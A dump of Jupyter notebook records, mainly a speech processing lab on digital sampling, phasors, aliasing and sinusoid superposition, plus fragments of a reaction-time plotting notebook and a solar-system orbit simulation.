"_____no_output_____" ], [ "f, axes = plt.subplots(1,2)\n\n# RT Histogram\ndrt_bins = np.arange(-0.6,0.6,0.025)\nsns.distplot(data['dRT'].loc[data['postlong']==True],bins=drt_bins,label='Post-Long',ax=axes[0])\nsns.distplot(data['dRT'].loc[data['postlong']==False],bins=drt_bins,label='Post-Short',ax=axes[0])\naxes[0].legend() # can also get the figure from plt.gcf()\naxes[0].set_xlim(min(drt_bins),max(drt_bins))\n\n# Factor Plot\nsns.boxplot(data=data,x='postlong',y='dRT',hue='postlong',ax=axes[1])\n\n# Add overall title\nplt.subplots_adjust(top=0.9,wspace=0.3)\nf.suptitle(SBJ+' RT by ITI (p='+str(round(postlong_p,6))+')') # can also get the figure from plt.gcf()\n\n# Save plot\nplt.savefig(results_dir+'BHV/RTs/hist_dRT/'+SBJ+'_dRT_postlong_hist_box'+fig_type)", "_____no_output_____" ] ], [ [ "##RT and Accuracy Effects by ITI and across post-error", "_____no_output_____" ] ], [ [ "# RTs by condition\n# if len(prdm_params['ITIs'])==4: # target_time v1.8.5+\n# data['ITI type'] = ['short' if data['ITI'][ix]<0.5 else 'long' for ix in range(len(data))]\n# ITI_plot_order = ['short','long']\n# elif len(prdm_params['ITIs'])==3: # target_time v1.8.4 and below\n# data['ITI type'] = ['short' if data['ITI'][ix]<prdm_params['ITI_bounds'][0] else 'long' \\\n# if data['ITI'][ix]>prdm_params['ITI_bounds'][1] else 'medium'\\\n# for ix in range(len(data))]\n# ITI_plot_order = ['short','medium','long']\n# else: # Errors for anything besides len(ITIs)==3,4\n# assert len(prdm_params['ITIs'])==4\n\nplot = 
sns.factorplot(data=data,x='ITI type',y='dRT',hue='PE',col='Condition',kind='point',\n ci=95);#,order=ITI_plot_order\nplt.subplots_adjust(top=0.9)\nplot.fig.suptitle(SBJ) # can also get the figure from plt.gcf()\n\nplt.savefig(results_dir+'BHV/RTs/hist_PE_ITI/'+SBJ+'_RT_PE_ITI_hit'+fig_type)", "_____no_output_____" ], [ "# WARNING: I would need to go across subjects to get variance in accuracy by ITI\nplot = sns.factorplot(data=data,x='ITI type',y='Acc_ITI',col='Condition',kind='point',sharey=False,\n ci=95);#,order=ITI_plot_order\n#plot.set(alpha=0.5)\nplt.subplots_adjust(top=0.9)\nplot.fig.suptitle(SBJ) # can also get the figure from plt.gcf()\n\nplt.savefig(results_dir+'BHV/accuracy/'+SBJ+'_acc_ITI'+fig_type)", "_____no_output_____" ] ], [ [ "## Look for behavioral adjustments following short and long responses", "_____no_output_____" ] ], [ [ "plot = sns.factorplot(data=data_PL,x='ITI type',y='RT',hue='PE',col='Condition',kind='point',\n ci=95,order=prdm['ITIs']);\nplt.subplots_adjust(top=0.9)\nplot.fig.suptitle(SBJ+'_post-long') # can also get the figure from plt.gcf()\n\n# plt.savefig(results_dir+'RT_plots/'+SBJ+'_RT_PE_ITI_hit'+fig_type)\nplot2 = sns.factorplot(data=data_PS,x='ITI type',y='RT',hue='PE',col='Condition',kind='point',\n ci=95,order=prdm['ITIs']);\nplt.subplots_adjust(top=0.9)\nplot2.fig.suptitle(SBJ+'_post-short') # can also get the figure from plt.gcf()\n\n# plt.savefig(results_dir+'RT_plots/'+SBJ+'_RT_PE_ITI_hit'+fig_type)", "_____no_output_____" ] ] ]
[ "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ] ]
cb1f3718662b2f53810a11c2b0c9a48b824794f2
33,019
ipynb
Jupyter Notebook
signals/signals-lab-1/signals-1-2-sampling-sinusoids.ipynb
laic/uoe_speech_processing_course
7cbc0424e87a8a98fd92fb664c9c156c83323f78
[ "MIT" ]
19
2020-09-20T17:01:53.000Z
2021-12-15T18:24:06.000Z
signals/signals-lab-1/signals-1-2-sampling-sinusoids.ipynb
laic/uoe_speech_processing_course
7cbc0424e87a8a98fd92fb664c9c156c83323f78
[ "MIT" ]
null
null
null
signals/signals-lab-1/signals-1-2-sampling-sinusoids.ipynb
laic/uoe_speech_processing_course
7cbc0424e87a8a98fd92fb664c9c156c83323f78
[ "MIT" ]
10
2020-09-25T08:09:50.000Z
2021-09-14T03:28:01.000Z
46.968706
721
0.631576
[ [ [ "#### _Speech Processing Labs 2021: SIGNALS 1: Digital Signals: Sampling and Superposition_", "_____no_output_____" ] ], [ [ "## Run this first!\n%matplotlib inline\nimport sys\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nimport cmath\nfrom matplotlib.animation import FuncAnimation\nfrom IPython.display import HTML\nplt.style.use('ggplot')\n\nfrom dspMisc import *", "_____no_output_____" ] ], [ [ " \n# Digital Signals: Sampling and Superposition\n\n### Learning Outcomes\n* Understand how we can approximate a sine wave with a specific frequency, given a specific sampling rate\n* Understand how sampling rate limits the frequencies of sinusoids we can describe with discrete sequences\n* Explain when aliasing will occurr and how this relates the sampling rate and the Nyquist frequency.\n* Observe how compound waveforms can be described as a linear combination of phasors ('superposition')\n\n### Background\n* Topic Videos: Digital Signal, Short Term Analysis, Series Expansion\n* [Interpreting the discrete fourier transform](./signals-1-1-interpreting-the-discrete-fourier-transform.ipynb)\n\n#### Extra background (extension material)\n* [Phasors, complex numbers and sinusoids](./signals-1-2a-digital-signals-complex-numbers.ipynb)\n", "_____no_output_____" ], [ "## 1 Introduction\n\nIn the class videos, you've seen that sound waves are changes in air pressure (amplitude) over time. In the notebook [interpreting the discrete fourier transform](./signals-1-1-interpreting-the-discrete-fourier-transform.ipynb), we saw that we can \ndecompose complex sound waves into 'pure tone' frequency components. We also saw that the output of the DFT was actually a sequence of complex numbers! In this notebook, we'll give a bit more background on the relationship \nbetween complex numbers and sinusoids, and why it's useful to characterise sinusoids in the complex plane. ", "_____no_output_____" ], [ "## 2 Phasors and Sinusoids: tl;dr\n\nAt this point, I should say that you can get a conceptual understanding of digital signal processing concepts without going through _all_ the math. We certainly won't be examining your knowledge of complex numbers or geometry in this class. Of course, if you want to go further in understanding digital signal processing then you will have to learn a bit more about complex numbers, algebra, calculus and geometry than we'll touch upon here.\n\nHowever, right now the main point that we'd like you to take away from this notebook is that we can conveniently represent periodic functions, like sine waves, in terms of **phasors**: basically what shown on the left hand side of the following gif:\n\n![Phasor to sine wave gif](../fig/phasor.gif)\n\nYou can think of the **phasor as an analogue clockface** with one moving hand. On the right hand side is one period of a 'pure tone' sinusoid, sin(t). \n\nNow, we can think of every movement of the 'clockhand' (the phasor is actually this **vector**) as a step in time on the sinusoid graph: at every time step, the phasor (i.e., clockhand) rotates by some angle. If you follow the blue dots on both graphs, you should be able to see that the amplitude of the sinusoid matches the height of the clockhand on the phasor at each time step. \n\nThis gives us a different way of viewing the periodicity of $\\sin(t)$. The sinusoid starts to repeat itself when the phasor has done one full circle. 
So, rather than drawing out an infinite time vs amplitude graph, we can capture the behaviour of this periodic function in terms rotations with respect to this finite circle. \n\nSo, what's the connection with complex numbers? Well, that blue dot on the phasor actually represents a complex number, and the dimensions of that graph are actually the **real** (horizontal) and **imaginary** (vertical) parts of that number. That is, a complex number of the form $a + jb$, where $a$ is the real part and $b$ is the imaginary part. Quite conveniently, we can also express complex numbers in terms of a **magnitude** or radius $r$ (length of the clockhand) and a **phase angle** $\\theta$ (angle of rotation from the point (1,0)) and an exponential. So, we can write each point that the phasor hits in the form $re^{j\\theta}$. This will be familiar if you've had a look at the DFT formulae. \n\nThis relationship with complex numbers basically allows us to describe complicated periodic waveforms in terms of combinations of 'pure tone' sinusoids. It turns out that maths for this works very elegantly using the phasor/complex number based representation. \n\nThe basic things you need to know are:\n\n* A **sinusoid** (time vs amplitude, i.e. in the **time domain**) can be described in terms of a vector rotating around a circle (i.e. a phasor in the complex plane)\n* The **phasor** vector (i.e., 'clockhand') is described by a complex number $re^{j\\theta}$\n* $re^{j\\theta}$ is a point on a circle centered at (0,0) with radius $r$, $\\theta$ degrees rotated from $(r,0)$ on the 2D plane. \n * the **magnitude** $r$ tells us what the peak amplitude of the corresponding sine wave is\n * the **phase angle** $\\theta$ tells us how far around the circle the phasor has gone:\n * zero degrees (0 radians) corresponds to the point (r,0), while 90 degrees ($\\pi/2$ radians) corresponds to the point (0,r)\n* The vertical projection of the vector (onto the y-axis) corresponds to the amplitude of a **sine wave** $\\sin(\\theta)$ \n* The horizontal projection of the vector (onto the x-axis) corresponds to the amplitude of a **cosine wave** $\\cos(\\theta)$ \n* The **period** of these sine and cosine waves is the same as the time it takes to make one full circle of the phasor (in seconds). As such the **frequency** of the sine and cosine waves is the same as the frequency with which the phasor makes a full cycle (in cycles/second = Hertz). \n\nIf you take the maths on faith, you can see all of this just from the gif above. You'll probably notice in most phonetics text books, if they show this at all, they will just show the rotating phasor without any of the details. \n\nIf you want to know more about how this works, you can find a quick tour of these concepts in the (extension) notebook on [complex numbers and sinusoids](./sp-m1-2-digital-signals-complex-numbers). But it's fine if you don't get all the details right now. In fact, if you get the intuition behind from the phasor/sinusoid relationship above, it's fine to move on now to the rest of the content in this notebook. ", "_____no_output_____" ], [ "## Changing the frequency of a sinusoid\n\nSo, we think of sine (and cosine) waves in terms of taking steps around a circle in the 2D (complex) plane. Each of these 'steps' was represented by a complex number, $re^{j\\theta}$ (the phasor) where the magnitude $r$ tells you the radius of the circle, and the phase angle $\\theta$ tells you how far around the circle you are. 
When $\\theta = 0$, means you are at the point (r,0), while $\\theta = 90$ degrees means you are at the point (0,r). There are 360 degrees (or 2$\\pi$ radians) makes a complete cycle, i.e. when $\\theta = 360$ degrees, you end up back at (r,0).\n\n<div class=\"alert alert-success\">\n It's often easier to deal with angles measured in <strong>radians</strong> rather than <strong>degrees</strong>. The main thing to note is that:\n $$2\\pi \\text{ radians} = 360 \\text{ degrees, i.e. 1 full circle }$$\nAgain, it may not seem obvious why we should want to use radians instead of the more familiar degrees. The reason is that it makes dividing up a circle really nice and neat and so ends up making calculations much easier in the long run!\n</div>\n\nSo that describes a generic sinusoid, e.g. $\\sin(\\theta)$, but now you might ask yourself how do we generate a generate a sine wave with a specific frequency $f$ Herzt (Hz=cycles/second)? \n\nLet's take a concrete example, if we want a sinusoid with a frequency of $f=10$ Hz, that means:\n* **Frequency:** we need to complete 10 full circles of the phasor in 1 second. \n* **Period:** So, we have to complete 1 full cycle every 1/10 seconds (i.e. the period of this sinusoid $T=0.1$ seconds). \n* **Angular velocity:** So, the phasor has to rotate at a speed of $2\\pi/0.1 = 20\\pi$ radians per second\n\nSo if we take $t$ to represent time, a sine wave with frequency 10 Hz has the form $\\sin(20\\pi t)$\n* Check: at $t=0.1$ seconds we have $\\sin(20 \\times \\pi \\times 0.1) = \\sin(2\\pi)$, one full cycle. \n* This corresponds to the phasor $e^{20\\pi t j}$, where $t$ represents some point in time. \n\nIn general:\n* A sine wave with peak amplitude R and frequency $f$ Hz is expressed as $R\\sin(2 \\pi f t)$\n * The amplitude of this sine wave at time $t$ corresponds to the imaginary part of the phasor $Re^{2\\pi ftj}$. \n* A cosine wave with peak amplitude R and frequency $f$ Hz is expressed as $\\cos (2 \\pi f t$)\n * The amplitude of this cosine wave at time $t$ corresponds to the real part of the phasor $Re^{2\\pi ftj}$. \n\n\nThe term $2\\pi f$ corresponds to the angular velocity, often written as $\\omega$ which is measured in radians per second.\n\n\n\n\n", "_____no_output_____" ], [ "### Exercise\nQ: What's the frequency of $\\sin(2\\pi t)$? \n", "_____no_output_____" ], [ "## Frequency and Sampling Rate\n\nThe representation above assumes we're dealing with a continuous sinusoid, but since we're dealing with computers we need to think about digital (i.e. discrete) representations of waveforms. \nSo if we want to analyze a wave, we also need to sample it at a specific **sampling rate**, $f_s$. \n\nFor a given sampling rate $f_s$ (samples/second) we can work out the time between each sample, the **sampling period** as:\n\n$$ t_s = \\frac{1}{f_s}$$ \n\nThe units of $t_s$ is seconds/sample. That means that if we want a phasor to complete $f$ cycles/second, the angle between each sampled $\\theta_s$ step will need to be a certain size in order to complete a full cycle every $t_s$ seconds. \n\nThe units here help us figure this out: the desired frequency $f$ has units cycles/second. So, we can calculate what fraction of a complete cycle we need to take with each sample by multiplying $f$ with the sampling time $t_s$. \n* $c_s = ft_s$. 
\n* cycles/sample = cycles/second x seconds/sample \n\nWe know each cycle is $2\\pi$ radians (360 degrees), so we can then convert $c_s$ to an angle as follows: \n* $ \\theta_s = 2 \\pi c_s $\n", "_____no_output_____" ], [ "### Exercise\n\nQ: Calculate the period $t_s$ and angle $\\theta_s$ between samples for a sine wave with frequency $f=8$ Hz and sampling rate of $f_s=64$ \n", "_____no_output_____" ], [ "### Notes", "_____no_output_____" ], [ "### Setting the Phasor Frequency\n\nI've written a function `gen_phasors_vals_freq` that calculates the complex phasor values (`zs`), angles (`thetas`) and time steps (`tsteps`) for a phasor with a given frequency `freq` over a given time period (`Tmin` to `Tmax`). In the following we'll use this to plot how changes in the phasor relate to changes in the corresponding sinusoid given a specific sampling rate (`sampling_rate`). ", "_____no_output_____" ], [ "#### Example: \n\nLet's look at a phasor and corresponding sine wave with frequency $f=2$ Hz (`freq`), given a sampling rate of $f_s=16$ (`sampling_rate`) over 4 seconds. ", "_____no_output_____" ] ], [ [ "## Our parameters:\nTmin = 0\nTmax = 4\n\nfreq = 2 # cycles/second\nsampling_rate = 16 # i.e, f_s above\nt_step=1/sampling_rate # i.e., t_s above", "_____no_output_____" ], [ "## Get our complex values corresponding to the phasor with frequency freq\nzs, thetas, tsteps = gen_phasor_vals_freq(Tmin=Tmin, Tmax=Tmax, t_step=t_step, freq=freq)\n\n## Project to real and imaginary parts for plotting\nXs = np.real(zs)\nYs = np.imag(zs)\n\n\n## generate the background for the plot: a phasor diagram on the left, a time v amplitude graph on the right\nfig, phasor, sinusoid = create_anim_bkg(tsteps, thetas, freq)\n\n## the phasor is plotted on the left on the left with a circle with radius 1 for reference\nphasor.set_xlabel(\"Real values\")\nphasor.set_ylabel(\"Imaginary values\")\n# plot the points the phasor will \"step on\"\nphasor.scatter(Xs, Ys)\n\n## Plot our actual sampled sine wave in magenta on the right\nsinusoid.plot(tsteps, Ys, 'o', color='magenta')\nsinusoid.set_xlabel(\"Time (s)\")\nsinusoid.set_ylabel(\"Amplitude\")", "_____no_output_____" ] ], [ [ "You should see two graphs above:\n* On the left is the phasor diagram: the grey circle represents a phasor with magnitude 1, the red dots represents the points on the circle that the phasor samples between `tmin` and `tmax` given the `sampling_rate`. \n* On the right is the time versus amplitude graph: The grey line shows a continuous sine wave with with frequency `freq`, the magenta dots show the points we actually sample between times `tmin` and `tmax` given the `sampling_rate`. \n\nYou can see that although we sample 64 points for the sine wave, we actually just hit the same 8 values per cycle on the phasor. \n\nIt's clearer when we animate it the phasor in time: ", "_____no_output_____" ] ], [ [ "## Now let's animate it! 
\n## a helper to draw the 'clockhand' line\nX, Y, n_samples = get_line_coords(Xs, Ys)\n## initialize the animation\nline = phasor.plot([], [], color='b', lw=3)[0]\nsin_t = sinusoid.plot([], [], 'o', color='b')[0]\nfigs = (line, sin_t)\n\nanim = FuncAnimation(\n fig, lambda x: anim_sinusoid(x, X=X, Y=Y, tsteps=tsteps, figs=figs), interval=600, frames=n_samples)\n \nHTML(anim.to_html5_video())\n", "_____no_output_____" ] ], [ [ "\n### Exercise \nChange the `freq` variable in the code below to investigate: \n\n* What happens when the sine wave frequency (cycles/second) `freq` is set to `sampling_rate/2`?\n* What happens when the frequency `freq` approaches the half the `sampling_rate`? \n* What happens when the frequency `freq` equals the half the `sampling_rate`? \n* What happens when the frequency `freq` is greater than `sampling_rate/2`", "_____no_output_____" ] ], [ [ "## Example: Play around with these values\nTmax = 1\nTmin = 0\n\nfreq = 15 # cycles/second\nsampling_rate = 16 # f_s above\nt_step=1/sampling_rate\n\nprint(\"freq=%.2f cycles/sec, sampling rate=%.2f samples/sec, sampling period=%.2f sec\" % (freq, sampling_rate, t_step) )\n\n## Get our complex values corresponding to the sine wave\nzs, thetas, tsteps = gen_phasor_vals_freq(Tmin=Tmin, Tmax=Tmax, t_step=t_step, freq=freq)\n\n## Project to real and imaginary parts for plotting\nXs = np.real(zs)\nYs = np.imag(zs)\n\n## generate the background\nfig, phasor, sinusoid = create_anim_bkg(tsteps, thetas, freq)\n\n## Plot the phasor samples\nphasor.scatter(Xs, Ys)\nphasor.set_xlabel(\"Real values\")\nphasor.set_ylabel(\"Imaginary values\")\n\n## Plot our actual sampled sine wave in magenta\nsinusoid.plot(tsteps, Ys, 'o-', color='magenta')\nsinusoid.set_xlabel(\"Time (s)\")\nsinusoid.set_ylabel(\"Amplitude\")\n\n## Animate the phasor and sinusoid\nX, Y, n_samples = get_line_coords(Xs, Ys)\n\nline = phasor.plot([], [], color='b', lw=3)[0]\nsin_t = sinusoid.plot([], [], 'o', color='b')[0]\nfigs = (line, sin_t)\nanim = FuncAnimation(\n fig, lambda x: anim_sinusoid(x, X=X, Y=Y, tsteps=tsteps, figs=figs), interval=600, frames=n_samples)\n \nHTML(anim.to_html5_video())\n", "_____no_output_____" ] ], [ [ "### Notes\n", "_____no_output_____" ], [ "## Aliasing\n\nIf you change the frequency (`freq`) for the phasor to be higher than half the sampling rate , you'll see that the actual frequency of the sinusoid doesn't actually keep getting higher. In fact, with `freq=8` the sine wave (i.e. projection of the vertical (imaginary) component) doesn't appear to have any amplitude modulation at all. However, keen readers will note that for `sampling_rate=16` and `freq=8` in the example above, the real projection (i.e. cosine) would show amplitude modulations since $\\cos(t)$ is 90 degree phase shifted relative to $\\sin(t)$. The phasor `freq=15` appears to complete only one cycle per second, just like for `freq=1`, but appears to rotating the opposite way. \n\nThese are examples of **aliasing**: given a specific sampling rate there is a limit to which we can distinguish different frequencies because we simply can't take enough samples to show the difference! \n\nIn the example above, even though we are sampling from a 15 Hz wave for `freq=15`, we only get one sample per cycle and the overall sampled sequence looks like a 1 Hz wave. So, the fact that the phasor appears to rotate the opposite way to `freq=1` is because it's actually just the 15th step of the `freq=1` phasor. 
\n\n<div class=\"alert alert-success\">\nIn general, with a sampling rate of $f_s$ we can't distinguish between a sine wave of frequency $f_0$ and a sine wave of $f_0 + kf_s$ for any integer $k$.\n</div>\n\nThis means that we can't actually tell the frequency of the underlying waveform based on the sample amplitudes alone. \n\nThe practical upshot of this is that for sampling rate $f_s$, the highest frequency we can actually sample is $f_s/2$, the **Nyquist Frequency**. This is one of the most important concepts in digital signal processing and will effect pretty much all the methods we use. It's why we see the mirroring effect in [the DFT output spectrum](./signals-1-1-interpreting-the-discrete-fourier-transform.ipynb). So, if you remember just one thing, remember this! \n\n", "_____no_output_____" ], [ "## Superposition\n\nThis use of phasors to represent sinusoids may seem excessively complex at the moment, but it actually gives us a nice way of visualizing what happens when we add two sine waves together, i.e. linear superposition. \n\nWe've seen how the Fourier Transform gives us a way of breaking down periodic waveforms (no matter how complicated) into a linear combination of sinusoids (cosine waves, specifically). But if you've seen the actual DFT equations, you'll have noticed that each DFT output is actually is described in terms of phasors of specific frequencies (e.g. sums over $e^{-j \\theta}$ values). We can now get at least a visual idea of what this means.\n\nLet's look at how can combining phasors can let us define complicated waveforms in a simple manner. \n", "_____no_output_____" ], [ "### Magnitude and Phase Modifications\nFirst, let's note that we can easily change the magnitude and phase of a sine wave before adding it to others to make a complex waveform. \n\n* We can change the magnitude of a sinusoidal component by multiplying all the values of that sinusoid by a scalar $r$.\n\n* We can apply a phase shift of $\\phi$ radians to $\\sin(\\theta)$ to gives us a sine wave of the form: $\\sin(\\theta + \\phi)$. It basically means we start our cycles around the unit circle at $e^{i\\phi}$ instead of at $e^{i0} = 1 + i0 \\mapsto (1,0)$ ", "_____no_output_____" ], [ "### Generating linear combinations of sinusoids\n\nLet's plot some combinations of sinusoids.\n\nFirst let's set the sampling rate and the start and end times of the sequence we're going to generate:", "_____no_output_____" ] ], [ [ "## Some parameters to play with \nTmax = 2\nTmin = 0\n\nsampling_rate = 16\nt_step=1/sampling_rate", "_____no_output_____" ] ], [ [ "Now, let's create some phasors with different magnitudes, frequencies and phases. Here we create 2 phasors with magnitude 1 and no phase shift, one with `freq=2` Hz and another phasor with frequency `2*freq`. \n\nWe then add the two phasors values together at each timestep (`zs_sum` in the code below): ", "_____no_output_____" ] ], [ [ "## Define a bunch of sinusoids. We can do this in terms of 3 parameters: \n## (magnitude, frequency, phase)\n\n## The following defines two sinusoids, both with magnitude (peak amplitude) 1 and the same phase (no phase shift) \n## The second has double the frequency of the first:\nfreq=2\nparams = [(1, freq, 0), (1, 2*freq, 0)] \n\n## Later: change these values and see what happens, e.g. 
\n#params = [(1, freq, 0), (0.4, 5*freq, 0), (0.4, 5*freq, np.pi)] \n\nphasor_list = []\ntheta_list = []\ntsteps_list = []\n\n## Generate a list of phasors for each set of (mag, freq, phase) parameters\nfor mag, freq, phase in params: \n ## Generate a phasor with frequency freq\n ## zs are the phasor values\n ## thetas are the corresponding angles for each value in zs\n ## tsteps are the corresponding time steps for each value in zs\n zs, thetas, tsteps = gen_phasor_vals_freq(Tmin=Tmin, Tmax=Tmax, t_step=t_step, freq=freq) \n \n ## Apply the phase_shift \n phase_shift = np.exp(1j*phase)\n \n ## scale by the magnitude mag - changes the peak amplitude\n zs = mag*zs*phase_shift\n \n ## Append the phasor to a list\n phasor_list.append(zs)\n \n ## The angle sequence and time sequence in case you want to inspect them\n ## We don't actually use them below\n theta_list.append(thetas)\n tsteps_list.append(tsteps)\n\n## Superposition: add the individual phasors in the list together (all with the same weights right now)\nzs_sum = np.zeros(len(tsteps_list[0]))\nfor z in phasor_list: \n zs_sum = zs_sum + z", "_____no_output_____" ] ], [ [ "Now, we can plot the sine (vertical) component of the individual phasors (on the right), ignoring the cosine (horizontal) component for the moment. ", "_____no_output_____" ] ], [ [ "## Plot the phasor (left) and the projection of the imaginary (vertical) component (right)\n## cosproj would be the projection to the real axis, but let's just ignore that for now\n\nfig, phasor, sinproj, cosproj = create_phasor_sinusoid_bkg(Tmin, Tmax, ymax=3, plot_phasor=True, plot_real=False, plot_imag=True,)\n\ndense_tstep=0.001\nfor mag, freq, phase in params: \n ## We just want to plot the individual sinusoids (time v amplitude), so we ignore \n ## the complex numbers we've been using to plot the phasors\n _, dense_thetas, dense_tsteps = gen_phasor_vals_freq(Tmin, Tmax, dense_tstep, freq) \n sinproj.plot(dense_tsteps, mag*np.sin(dense_thetas+phase), color='grey')", "_____no_output_____" ] ], [ [ "Now plot the sum of the phasors (left) and the projected imaginary component in magenta (right) - that is, the sum of the sine components (in grey)", "_____no_output_____" ] ], [ [ "## Plot sinusoids as sampled\nXlist = []\nYlist = []\n\n## some hacks to get to represent the individual phasors as lines from the centre of a circle as well as points\nfor i, zs in enumerate(phasor_list):\n Xs_ = np.real(zs)\n Ys_ = np.imag(zs)\n X_, Y_, _ = get_line_coords(Xs_, Ys_)\n Xlist.append(X_)\n Ylist.append(Y_)\n\n## Project the real and imaginary parts of the timewise summed phasor values\nXs = np.real(zs_sum)\nYs = np.imag(zs_sum)\nXline, Yline, _ = get_line_coords(Xs, Ys)\n\n## plot the summed phasor values as 2-d coordinates (left)\n\n## plot the sine projection of the phasor values in time (right)\nsinproj.plot(tsteps_list[0], Ys, color='magenta')\nfig", "_____no_output_____" ] ], [ [ "Now let's see an animation of how we're adding these phasors together! ", "_____no_output_____" ] ], [ [ "anim = get_phasor_animation(Xline, Yline, tsteps, phasor, sinproj, cosproj, fig, Xlist=Xlist, Ylist=Ylist, params=params)\nanim", "_____no_output_____" ] ], [ [ "In the animation above you should see: \n* the red circle represents the first phasor (`freq=2`)\n* the blue circle represents the 2nd phasor (`freq=4`)\n* In adding the the two phasors together, we add the corresponding vectors for each phasor at each point in time. 
", "_____no_output_____" ], [ "### Exercise:\n\n\n* What happens when you add up two sinusoids with the same frequency but different magnitudes\n * e.g. `params = [(1, freq, 0), (2, freq, 0)]`\n \n \n* What happens when you change the phase? \n * Can you find $\\phi$ such that $\\sin(\\theta+\\phi) = \\cos(\\theta)$ ? \n \n \n* When do the individual sinusoids cancel each other out? \n\n\n* Assume you have a compound sinusoid defined by the following params: \n * `params = [(1, freq, 0), (0.4, 5*freq, 0)]` \n * What sinusoid could you add to cancel the higher frequency component out while keeping the lower frequency one? \n", "_____no_output_____" ], [ "### Notes\n", "_____no_output_____" ], [ "## Maths Perspective: The DFT equation as a sum of phasors\n\nNow if you look at the mathematical form of the DFT, you can start to recognize this as representing a sequence of phasors of different frequencies, which have a real (cosine) and imaginary (sine) component. \n\nThe DFT is defined as follows:\n\n* For input: $x[n]$, for $n=0..N-1$ (i.e. a time series of $N$ samples)\n* We calculate an output of N complex numbers $\\mapsto$ magnitude and phases of specific phasors:\n\nWhere the $k$th output, DFT[k], is calculated using the following equation: \n$$ \n\\begin{align}\nDFT[k] &= \\sum_{n=0}^{N-1} x[n] e^{-j \\frac{2\\pi n}{N} k} \\\\\n\\end{align}\n$$\n\nWhich is equivalent to the following (using Euler's rule):\n\n$$\n\\begin{align}\nDFT[k] &= \\sum_{n=0}^{N-1} x[n]\\big[\\cos(\\frac{2\\pi n}{N} k) - j \\sin(\\frac{2\\pi n}{N} k) \\big] \n\\end{align}\n$$\n\nThis basically says that each DFT output is the result of multiplying the $n$th input value $x[n]$ with the $n$th sample of a phasor (hence sine and cosine waves) of a specific frequency, and summing the result (hence the complex number output). The frequency of DFT[k] is $k$ times the frequency of DFT[1], where the frequency of DFT[1] depends on the input size $N$ and the sampling rate (as discussed the [this notebook](./signals-1-1-interpreting-the-discrete-fourier-transform.ipynb)). The sampling rate determines the time each phasor step takes, hence how much time it takes to make a full phasor cycle, hence what frequencies we can actually compare the input against. \n\nThe pointwise multiplication and summation is also known as a dot product (aka inner product). The dot product between two vectors tells us how similar those two vectors are. So in a very rough sense, the DFT 'figures out' which frequency components are present in the input, by looking at how similar the input is to each of the N phasors represented in the DFT output. \n\nThere are two more notebooks on the DFT for this module, but both are extension material (not essential).\n\n* [This notebook](./signals-1-3-discrete-fourier-transform-in-detail.ipynb) goes into more maths details but is purely extension (you can skip)\n* [This notebook](./signals-1-4-more-interpreting-the-dft.ipynb) looks at a few more issues in interpreting the DFT\n\nSo, you can look at those if you want more details. Otherwise, we'll move onto the source-filter model in the second signals lab! \n", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown", "markdown" ] ]
cb1f3e1f9749d40ff8cef6a33fcfe07070774ab7
10,817
ipynb
Jupyter Notebook
notebooks/optimization_problem.ipynb
englhardt/ocs-evaluation
b1c1f33b44a3aa1ca6958d2efef91c69efcc60df
[ "MIT" ]
null
null
null
notebooks/optimization_problem.ipynb
englhardt/ocs-evaluation
b1c1f33b44a3aa1ca6958d2efef91c69efcc60df
[ "MIT" ]
4
2021-02-05T21:20:09.000Z
2021-08-05T09:36:23.000Z
notebooks/optimization_problem.ipynb
englhardt/ocs-evaluation
b1c1f33b44a3aa1ca6958d2efef91c69efcc60df
[ "MIT" ]
1
2022-01-28T02:46:41.000Z
2022-01-28T02:46:41.000Z
34.559105
198
0.514468
[ [ [ "empty" ] ] ]
[ "empty" ]
[ [ "empty" ] ]
cb1f51b6056c33b61f1700ee1cf8a271c18351b4
26,594
ipynb
Jupyter Notebook
solarsystem2.ipynb
jeplerucsc/astr-119-session-16
93346992b9169bc5c19d6d69ded079d1e66d6909
[ "MIT" ]
null
null
null
solarsystem2.ipynb
jeplerucsc/astr-119-session-16
93346992b9169bc5c19d6d69ded079d1e66d6909
[ "MIT" ]
null
null
null
solarsystem2.ipynb
jeplerucsc/astr-119-session-16
93346992b9169bc5c19d6d69ded079d1e66d6909
[ "MIT" ]
null
null
null
50.751908
2,537
0.542152
[ [ [ "%matplotlib inline\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom collections import namedtuple", "_____no_output_____" ], [ "class planet():\n \"A planet in our solar system\"\n def __init__(self,semimajor,eccentricity):\n self.x = np.zeros(2) #x and y position\n self.v = np.zeros(2) #x and y velocity\n self.a_g = np.zeros(2) #x and y acceleration\n self.t = 0.0 #current time\n self.dt = 0.0 #current timestep\n self.a = semimajor #semimajor axis of the orbit\n self.e = eccentricity #eccentricity of the orbit\n self.istep = 0 #current integer timestep1\n self.name = \"\" #name for the planet", "_____no_output_____" ], [ "solar_system = { \"M_sun\":1.0, \"G\":39.4784176043574320}", "_____no_output_____" ], [ "def SolarCircularVelocity(p):\n \n G = solar_system[\"G\"]\n M = solar_system[\"M_sun\"]\n r = (p.x[0]**2 + p.x[1]**2)**0.5\n \n #return the circular velocity\n return (G*M/r)**0.5", "_____no_output_____" ], [ "def SolarGravitationalAcceleration(p):\n \n G = solar_system[\"G\"]\n M = solar_system[\"M_sun\"]\n r = (p.x[0]**2 + p.x[1]**2)**0.5\n \n #acceleration in AU/yr/yr\n a_grav = -1.0*G*M/r**2\n \n #find the angle at this position\n 